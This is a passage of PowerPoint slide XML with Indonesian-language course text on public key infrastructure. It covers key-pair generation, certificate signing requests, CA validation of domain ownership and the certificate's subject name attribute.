              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klaim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepentingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkepentingan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerbitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>reputasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama-tama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cipher yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RSA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ECC, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melengkapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penandatanganan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (CSR) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA. CSR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publiknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meninjau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> valid. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server web, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan nama domain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>syarat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (FQDN) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CSR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diprakarsai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh orang yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WHOIS domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42826355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Atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Subjek</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperkenalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (CN) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama domain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>syarat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (FQDN) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> www.comptia.org. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebiasaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
